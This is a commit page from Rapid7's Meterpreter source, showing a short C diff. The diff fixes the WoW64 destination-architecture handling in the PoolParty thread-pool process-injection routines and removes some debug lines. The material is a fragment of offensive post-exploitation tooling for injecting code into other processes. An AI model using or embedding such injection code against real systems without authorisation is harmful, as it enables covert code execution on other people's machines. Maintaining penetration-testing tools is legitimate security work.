fix: handling WoW64 injection destinationArch

rapid7 · Sep 2, 2024 · 27cdb49 · 27cdb49
1 parent 3848d8b
commit 27cdb49
Show file tree

Hide file tree

Showing 2 changed files with 1 addition and 3 deletions.
diff --git a/c/meterpreter/source/metsrv/base_inject.c b/c/meterpreter/source/metsrv/base_inject.c
@@ -573,6 +573,7 @@ DWORD inject_via_poolparty(Remote* remote, Packet* response, HANDLE hProcess, DW
 				memcpy(lpStub, x64tox86, sizeof(x64tox86) - 1);
 				memcpy((LPBYTE)lpStub + sizeof(x64tox86) - 1, poolparty_stub_x86, sizeof(poolparty_stub_x86));
 				dwStubSize = sizeof(x64tox86) + sizeof(poolparty_stub_x86) - 2;
+				dwDestinationArch = PROCESS_ARCH_X64;
 			}
 
 			hTriggerEvent = CreateEvent(NULL, TRUE, FALSE, NULL);

diff --git a/c/meterpreter/source/metsrv/pool_party.c b/c/meterpreter/source/metsrv/pool_party.c
@@ -163,14 +163,11 @@ DWORD remote_tp_direct_insertion(HANDLE hProcess, DWORD dwDestinationArch, LPVOI
 	pNtDll* ntDll = NULL;
 	DWORD dwResult = ERROR_POOLPARTY_GENERIC;
 	HANDLE hHeap = GetProcessHeap();
-	dwDestinationArch = PROCESS_ARCH_X64;
 	DWORD dwDirectSize = dwDestinationArch == PROCESS_ARCH_X64 ? TP_DIRECT_STRUCT_SIZE_X64 : TP_DIRECT_STRUCT_SIZE_X86;
 
-	WOW64_CONTEXT test = { 0 };
 	LPVOID *Direct = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, dwDirectSize);
 	do {
 		ntDll = GetOrInitNtDll();
-		dprintf("%d fs offset: %p", sizeof(WOW64_CONTEXT), (QWORD)&test.SegFs - (QWORD)&test);
 		if (ntdll == NULL) {
 			BREAK_WITH_ERROR("[INJECT][inject_via_poolparty][remote_tp_direct_insertion] Cannot GetOrInitNtDll()", ERROR_POOLPARTY_GENERIC);
 		}